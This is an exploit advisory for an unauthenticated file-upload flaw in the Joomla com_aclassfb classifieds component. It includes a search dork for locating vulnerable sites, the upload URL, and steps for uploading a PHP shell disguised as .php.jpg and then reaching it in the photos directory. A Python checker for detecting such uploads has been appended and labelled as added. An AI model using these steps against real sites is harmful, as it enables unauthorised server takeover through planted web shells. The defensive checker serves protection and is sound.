Joomla com_aclassfb File Upload Vulnerability

2014.01.11
Credit: DevilScreaM
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#Title : Joomla com_aclassfb File Upload Vulnerability
#Author : DevilScreaM
#Date : 10 January 2014
#Category : Web Applications
#Vendor : http://www.almondsoft.com
#Type : PHP
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
          Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : File Upload
#Dork : inurl:com_aclassfb

File Upload

http://127.0.0.1/index.php?option=com_aclassfb

Exploit :

http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form

POC :

1. Select Category
2. After Select Category, Click Post New Ad
   http://127.0.0.1/index.php?option=com_aclassfb&Itemid=[ID]&ct=[CATEGORY]&md=add_form
3. Upload Your Shell
   extension : .php .php.jpg / etc

Shell Access :

http://127.0.0.1/component/com_aclassfb/photos/
Find Your Shell
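For site owners running this component, a check for the weakness described above, as an added example that is not part of the original advisory or the vendor's code. It rejects the `.php` and `.php.jpg` names the advisory lists and can audit the component's photos directory for files already uploaded. The function names, the extension lists and the image-only allow-list are assumptions made for illustration.

```python
import os
import re

# Assumed list of extensions a PHP-enabled server may execute; match it to the real handler config.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}
ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif"}  # assumption: the ad form should accept photos only
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}
# Matches "<?php" and "<?="; bare "<?" short tags are not covered.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def check_upload(name: str, data: bytes) -> list[str]:
    """Return the reasons a file should be rejected or flagged (empty list = clean)."""
    reasons = []
    parts = name.lower().rstrip(". ").split(".")
    exts = parts[1:]
    # Check every segment, not only the last one: with multi-extension handler
    # mappings a name such as "shell.php.jpg" can still be executed as PHP.
    if any(e in EXEC_EXTS for e in exts):
        reasons.append("executable extension in name")
    final = exts[-1] if exts else ""
    if final not in ALLOWED_EXTS:
        reasons.append("final extension not allow-listed")
    elif not data.startswith(MAGIC[final]):
        reasons.append("content does not match image type")
    if PHP_TAG.search(data):
        reasons.append("PHP open tag in content")
    return reasons

def audit_dir(root: str) -> dict[str, list[str]]:
    """Walk an upload directory and report every file that fails check_upload."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                reasons = check_upload(fn, fh.read())
            if reasons:
                findings[os.path.relpath(path, root)] = reasons
    return findings

if __name__ == "__main__":
    # Constructed samples, not taken from a real site.
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16
    for name, data in [("cat.jpg", jpeg), ("shell.php.jpg", jpeg + b"<?php ?>")]:
        print(name, check_upload(name, data) or "ok")
```

Point `audit_dir` at the component's photos directory on disk. Disabling script execution for that directory in the web server configuration covers the case where a file slips past name and content checks.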



Copyright 2024, cxsecurity.com

 
